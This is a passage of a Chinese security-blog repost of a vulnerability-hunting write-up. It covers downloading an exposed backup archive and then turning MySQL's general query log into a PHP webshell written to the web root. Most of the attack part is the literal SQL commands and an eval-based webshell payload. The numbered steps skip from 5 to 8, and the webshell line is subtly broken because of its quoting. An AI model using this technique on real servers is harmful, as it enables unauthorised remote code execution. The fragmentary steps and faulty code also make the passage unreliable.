3、使用ip直接访问,改地址可直接下载文件(猜测应该是配置失误导致)
4、发现该目录下有备份文件xxx.rar下载该文件5、找到文件中的敏感文件
8、直接使用sql写入getshell9、通过写入日志文件getshell10、读写权限+web绝对路径,修改日志文件为webshell具体利用方法如下:(1) 开启日志记录:set global general_log = "ON";(2) 查看当前的日志目录:show variables like 'general%';(3) 指定日志文件(目录结构可以直接访问phpinfo)set global general_log_file = "C:/phpStudy/WWW/404.php";(4)写入执行代码:select "<?php $string=@$_POST['b'];eval('$string');?>";
原文始发于微信公众号(蓝云Sec):一次CNVD漏洞挖掘过程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/4183872.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论